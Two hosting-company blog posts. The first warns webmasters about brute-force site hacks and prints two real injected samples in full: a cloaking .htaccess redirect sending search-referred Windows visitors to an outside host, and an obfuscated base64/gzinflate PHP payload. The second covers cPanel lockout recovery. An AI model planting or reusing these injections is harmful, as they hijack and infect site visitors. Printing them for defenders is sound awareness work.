Posted on

Hackers Redirecting Websites (.htaccess)

A quick note to fellow webmasters out there as well as business owners running websites.   We have seen a recent rash of brute force hacking attempts on our servers and our client’s servers.   There have been several successful brute force break-ins in the past 3 months.   Below are a couple of things to look for and some best practices in keeping your site and your data secure.

Best Practices

The following best practices will help thwart many of  the attempts to hack into your account using a brute force “cracker”.

Do Not Share Your Password

Do not share your passwords with anyone.  If you have a vendor you need to work with or an employee that needs access, create a specific login for them with their own passwords.

Do Not Dole Out Access Easily

Before creating a new account with access to your server first ask yourself if the person truly needs access.   If this is a limited one-time request consider setting up a generic vendor account that you re-use.  Change the password as soon as they are done with it.  Never allow more than one person/vendor/client use the account a time.

Use A Strong Password

This cannot be emphasized enough.  Do NOT use simple passwords.  Do not use passwords based on a single dictionary word.  DO use passwords with punctuation and capitalization.   The most common password is “password” or “password1”.  Brute force only works if you are using bad passwords.

Try using something like a jumbled phrase with special character replacements, even MyP@ssW0rd! is a much better than 90% of the passwords people use.    Get creative “IDon’tLikeMilk!” or “DoYouLikeMilk2?” are fairly easy to remember but hard for brute force bots to guess.

Footprints Left By Hackers

Most hackers have little interest in your data or in doing something directly malicious to your site.   The most prevalent reason to hack a site is to either distribute a virus to site visitors or to earn revenue form “pay per click” programs like Google Adsense.

Most often this means adding code to your site while keeping your site functional.  It does them no good if the site breaks.  They want people visiting your site while a program is downloaded to their browser behind-the-scenes or they are redirected to a site they didn’t intend to visit.  Some of the hacks even pop-under a browser window with an ad, click the ad, then close the window before you see it… earning the hacker 25-cents in the process.

.htaccess Modification

This is one we’ve seen a few times, the .htaccess file on your server redirects a number of special file requests to a site they get paid to send traffic to.

<IfModule prefork.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|metacrawler\.|mail\.|dogpile\?).*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(imgres\?q).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*ADb.*$ [NC]
RewriteCond %{HTTP_USER_AGENT} .*Windows.* [NC]
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ http://kike.therealtruthaboutaging.com/url?sa=t&source=web&cd=15&ved=0vFu49G3C&url=http://%{HTTP_HOST}%{REQUEST_URI}&ei=2ZMoeqjO6K+yqY2OyVEw8J+1pw==&usg=M4kjonDdK-kwm0WO2JdBFM&sig2=HKhlYtbOgR6MTETnCv3UJQ [R=302,L,CO=ADb:36:%{HTTP_HOST}:11060:/:0:HttpOnly]
</IfModule>
#5fc0e7448401802b00b0ad059685814b08cb5bd44015bae3c857ee73

index.php / index.htm modification

Here the hacker installs a binary representation of PHP or JavaScript commands into your web page.  This runs a program on the visitors browser which, depending on the code, can do any number of things from forcing a program download to adding a tracking cookie, to taking over the users search bar.  Some of these can be very nasty, others are less so and do relatively harmless (but annoying) browser redirection.

  <? require ("the_real_header.php");
#d93065#
echo(gzinflate(base64_decode("tVVNc5swEP0t5WKoBxcJ9MEo6qE59dwj44MHY2czjnGB2pNk8t+7WoFjJ9jNdCYDYlbS6u3b1RO6acsGdt330qYxM2BjPi0NrMLdommrn9suDJJgGjBsHFsaRNZanUZd8/j8o6431WIbRkWwa+qu7h53VTCf/X4pF115F1br6rBul9Ezoh1gu6wPs2Vd/nmotl20ssUkThm4JgVIDrGGBGQCioHIQSmQOUgGCkck4JNSTwLHYe3s03klgEvQDLIMhHLOqSaDfBKIEVQ7aAyAXtjFAQbok6KlU4i5goHPKyeVvYKgnaAvy898tXDEHRvtSKCB3TG8i4mp3EFjPNcjrphjMkIgpghuJAdOOciMcseXA8NZfCSNujX0oqG5C5K5wIoIMDIpOiMCnIC4Q3Qxcort2WV9pBxL5adxSPrypH38tx6KUtGs3yY/rTSlKNxXkC11nzR6Mo9LYd1L1cFKIylHVwzlEdRNnD9mJnwsX3vV148d5cEpQ9wNQpK0lB8HkBPnrtBqpNQ4g7swutknXbeIKinyM3axviyfEWkoSgbn3To6B9xX+qJkhJcMo3WU9eihINmP6Ij5zCQJQwzHSgxayvo9OpaUcI7SQzv7HPGdsTqVkPyHfI6n4Y2C4muIF6TlsS6p6xriqew8ir7OYJDkuPMHt+X8tA6b05/G/wB8f77HMD/+e/u8/7Yk+XOSEOGhD9LqZUDnJ3HJjxzjybxI5rN2t4EunMAkMnsbVHu83hbYNoF5wRtrH1XW31rFfm4OdmVaW8xNY391DWzXZlU3oRFSfLFgYGpZ9HyPVmvbaVMEK8RpsNUPt/i9Wzj7tl7i7Rgeivv5VzbNkqgP82Rb4+OFT5G5+dbfx38B")));
#/d93065#
?>

Summary

We hope that by getting this information online people start to learn a bit more about site security.   Insecure sites not only slow down the browser and are a detriment to the overall user experience, they can have much larger far-reaching affects that people don’t even think of.   One of the larger terrorist groups was found to be partly funded by Internet hacks like these.  25-cents-at-a-time clicks added up to over $1M that went straight into the terrorist network.  Now that’s a lot of clicks!  Imagine if they used this for a good cause… donate food or shelter to people in need, but that is a story for another site.

In the meantime, secure your site, remove the hacks, and create a better experience for your visitors.

 

Posted on

cPanel Brute Force Protection – regaining access

cPanel comes with a great feature called brute force protection.  The problem is, if you mis-type your password 5x in a row or if you have multiple people in the office, like we do, that try to get into various services and they combine to have 5 missed passwords in a row (ssh, mail, and whm logins all quality) then you will lock yourself out of your system.   Here are some tips & tricks that will help you regain access.

Gaining Initial Access

The easiest and quite possibly ONLY way to get back into your system is by logging in from a different IP address.  Sometimes you can do this by re-initializing your modem/router if you are on a DHCP assigned address from your ISP.  This is usually the case for residential service from DSL companies like AT&T (no other choices, huh?  we feel sorry for your), Comcast, or Roadrunner.   If you are on a business class like and have static IP addresses assigned then your public-facing IP won’t change.   You can try to do a One-To-One NAT to give yourself a different static IP, but that assumes you have more than one and you have one that is not being used.   You can try tethering your phone, assuming you have a smart phone.  You can also try to hop on a neighbors open wifi network if you have wireless.   You can also drag your laptop to the local Starbucks and try from there.  If you are wired you have a lot less choices, either call your IPP (hosting company) and ask them to reset brute force protection OR call your ISP and have them assign you a new static IP (if you have only one, chances are you don’t have servers mapped).

To summarize : get on a different network!

  • Try resetting your modem/router if you are on a DHCP address from your ISP.
  • Assign your PC a different static IP if you have a static IP group.
  • Tether your phone.
  • Jump on the neighbor’s network. (ask first)
  • Bring your laptop to a public WiFi hot spot.
  • Call your ISP for a new IP.
  • Call your IPP and ask them to reset cPanel brute force.

Cleaning Out Specific Blocked Entries

If you can gain SSH access you can clean out the errant entries in the cphulkd database that drives brute force protection, entering your IP address in the where clause to find and remove your blocked IP:

# mysql
mysql> use cphulkd;
mysql> select * from brutes where ip LIKE '%<your-ip-or-start-of-ip-address>%';
check the returned list to make sure what you think is your blocked IP is actually on the list.
mysql> delete from brutes where ip LIKE '%<your-ip-or-start-of-ip-address>%';
mysql> quit

Restarting cpHulkd

After making any changes make sure you restart cpHulkd:

# /usr/local/cpanel/etc/init/stopcphulkd
# /usr/local/cpanel/etc/init/startcphulkd

Cleaning Out ALL Blocked Entries

This will reset the “good guys” and the “bad guys”, but if you need a quick fix, don’t want to disable brute force protection, and aren’t comfortable with MySQL command line then go to the  brute force protection interface in cPanel and click the “flush db” button.

Make Sure You Don’t Get Blocked Again

Login to cPanel and go to the brute force protection interface.  Look for the trusted IP list link.  Add your IPs to that list.

Also Running APF?

You will need to stop the apf process from running:

# service apf stop

Then add your good IPs to the whitelist:

# vi /etc/apf/allow_hosts.rules